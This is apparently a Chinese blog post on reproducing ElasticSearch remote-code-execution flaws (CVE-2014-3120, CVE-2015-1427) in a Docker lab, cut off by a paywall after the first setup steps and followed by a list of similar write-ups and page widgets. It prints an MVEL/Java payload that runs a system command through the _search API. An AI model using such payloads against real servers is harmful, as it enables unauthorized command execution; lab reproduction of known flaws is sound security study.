ElasticSearch漏洞复现

最新推荐文章于 2025-10-15 16:40:16 发布
原创 最新推荐文章于 2025-10-15 16:40:16 发布 · 置顶 · 2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#elasticsearch #安全性测试 #web安全

文章详细介绍了ElasticSearch的搜索API和两个重大安全漏洞的复现过程,包括CVE-2014-3120,该漏洞允许通过_search的source参数执行任意MVEL表达式和Java代码,以及CVE-2015-1427,这个漏洞中Groovy脚本引擎可被用于绕过沙盒执行任意shell命令。复现步骤包括环境设置、漏洞利用payload的构造和执行结果展示。

目录

ElasticSearch简介

Elasticsearch(以下简称ES)是目前全文搜索引擎的首选。它是一个基于 Lucene 的搜索服务器,提供了一个分布式多用户能力的全文搜索引擎,它同时基于 RESTful Web 接口,可以快速地储存、搜索和分析海量数据。
ES安装部署成功后,默认端口是9200。

ElasticSearch _search API概述

对ES中存储的数据进行查询分析,使用关键字_search。如下

GET /_search    ## 在根目录下检索所有的index
GET /<target>/_search   ## 在指定索引下检索所有文档
GET /<target1>,<target2>/_search   ## 检索指定多个索引下的所有文档
GET /my_*/_search    ## 使用通配符,检索指定多个索引下的所有文档

ES提供查询的两种形式:URI Search和Request Boby Search。

ElasticSearch 漏洞复现

ElasticSearch CVE-2014-3120复现

  • 漏洞描述:
    在ES1.2之前Elasticsearch的默认配置启用动态脚本,这允许远程攻击者通过_search的source参数执行任意MVEL表达式和Java代码。
    MVEL执行命令代码:
    import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\A").next();
  • 启动环境:
    cd CVE-2014-3120
docker-compose up -d
    启动后,通过127.0.0.1:9200就可以访问,截图如下:
    在这里插入图片描述
    对应的浏览器访问结果,如下json:
    {
     
     
   	"status" : 200,
   	"
最低0.47元/天 解锁文章
web渗透测试漏洞复现Elasticsearch未授权漏洞复现
HACKONE的博客
03-18 3929
Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能存在未授权访问漏洞。这意味着攻击者可能获得 Elasticsearch 的所有权限,从而能够对数据进行任意操作。这可能导致业务系统中的敏感数据泄露、数据丢失、数据损坏。
漏洞复现ElasticSearch命令执行漏洞 (CVE-2014-3120)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 932
Elasticsearch 是一个基于 Lucene 库的搜索引擎,具有 HTTP Web 接口和无模式 JSON 文档。Elasticsearch 是用 Java 开发的,其支持 MVEL、js、Java 等语言,其老版本默认语言为 MVEL。MVEL -一个被众多 Java 项目使用的开源的表达式语言。Elasticsearch 1.2之前的版本默认配置启用了动态脚本,该脚本允许远程攻击者通过 _search 的 source 参数执行任意 MVEL 表达式和 Java 代码。...
[Vulfocus解题系列]ElasticSearch命令执行漏洞(CVE-2014-3120)
00勇士王子的博客
07-04 1820
漏洞介绍 Elasticsearch 是一个基于 Lucene 库的搜索引擎,具有 HTTP Web 接口和无模式 JSON 文档。Elasticsearch 是用 Java 开发的,其支持 MVEL、js、Java 等语言,其老版本默认语言为 MVEL。 MVEL :一个被众多 Java 项目使用的开源的表达式语言。 Elasticsearch 1.2之前的版本默认配置启用了动态脚本,该脚本允许远程攻击者通过 _search 的 source 参数执行任意 MVEL 表达式和 Java 代码。 影响版本
ElasticSearch远程代码执行漏洞复现:原理详解+环境搭建+渗透实践(CVE-2014-3120)
最新发布
mooyuan的网络安全博客
10-15 988
本文分析了ElasticSearch远程代码执行漏洞(CVE-2014-3120),该漏洞影响1.2及之前版本,由于MVEL脚本引擎未沙盒化,攻击者可通过_search接口提交恶意脚本实现任意代码执行。文章详细介绍了漏洞原理,并利用Vulhub搭建复现环境,演示了从环境启动到漏洞利用的全过程,包括数据创建和执行系统命令(如id、cat /etc/passwd)等操作。最后提供了升级版本或禁用动态脚本的修复建议。
Elasticsearch 未授权访问漏洞复现
一纸荒芜的博客
10-31 1万+
Elasticsearch 未授权访问漏洞
Elasticsearch未授权访问漏洞
12-22 7555
  Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 0x00 Elasticsearch 安装 前提,保证安装了JDK 1.7+ 下载地址:https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip (用迅雷打开下载,...
elasticsearch 代码执行 (CVE-2014-3120)漏洞复现
weixin_42675091的博客
04-03 589
elasticsearch 代码执行 (CVE-2014-3120)漏洞复现
Elasticsearch 常见漏洞复现合集
热门推荐
寒星的博客
05-27 1万+
Elasticsearch未授权访问 一、漏洞简介 ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。 二、影响版本 ALL 三、复现过程 复现环境 vulhub 复现步骤 安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。 http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。 http://xxxxxxxx:9.
vulhub漏洞复现十三_elasticsearch
weixin_44193247的博客
01-20 648
vulhub漏洞复现练习篇
ElasticSearch 命令执行漏洞(CVE-2014-3120)
EnerY3的博客
12-12 1437
Elasticsearch 命令执行漏洞(CVE-2014-3120),它允许攻击者通过发送精心构造的请求到 Elasticsearch 服务器来执行任意操作系统命令。这个漏洞存在于 Elasticsearch 的早期版本中,并且在较新的版本中已经被修复。
Elasticsearch_1.2漏洞利用工具
05-15
Elasticsearch_1.2漏洞利用工具,可以执行命令,上传文件,浏览文件。
Elasticsearch未授权访问漏洞复现
HEAVEN569的博客
03-12 1万+
简述 Elasticsearch是一个开源的高扩展的分布式全文搜索引擎,他可以近乎实时的存储、检索数据,本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据,Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。 漏洞原理:Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 .
ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试
ADummy的博客
02-24 465
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 MVEL执行命令的代码如下: import java.io.*; new java.util.Scanner(Runtime.g
ElasticSearch(CVE-2014-3120)命令执行漏洞复现
qq_44504968的博客
09-23 1294
ElasticSearch(CVE-2014-3120)命令执行漏洞复现漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 知识点普及: 1、Elasticsearch,是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下
Elasticsearch 未授权访问漏洞
龙卷风摧毁停车场
03-08 6786
ElasticSearch 是一款 Java 编写的企业级搜索服务,启动此服务默认开放 HTTP-9200 端口,可被非法操作数据。
漏洞预警:Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)
yuanlirong22的专栏
03-07 1380
Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)。允许攻击者操纵应用程序的JavaScript对象和属性,可能导致未经授权的数据访问、权限提升、拒绝服务或远程代码执行。在Kibana 8.15.0和8.17.1之间的版本中,该漏洞仅可由具有查看者角色的用户利用。在Kibana版本8.17.1和8.17.2中,它只能被具有fleet-all或integrations-all或actions:execute-advanced-connectors权限的用户利用。
未授权访问:Elasticsearch 未授权访问漏洞
qq_68163788的博客
05-19 4469
ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。由于Elasticsearch授权模块需要付费,所以免费开源的Elasticsearch可能存在未授权访问漏洞
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值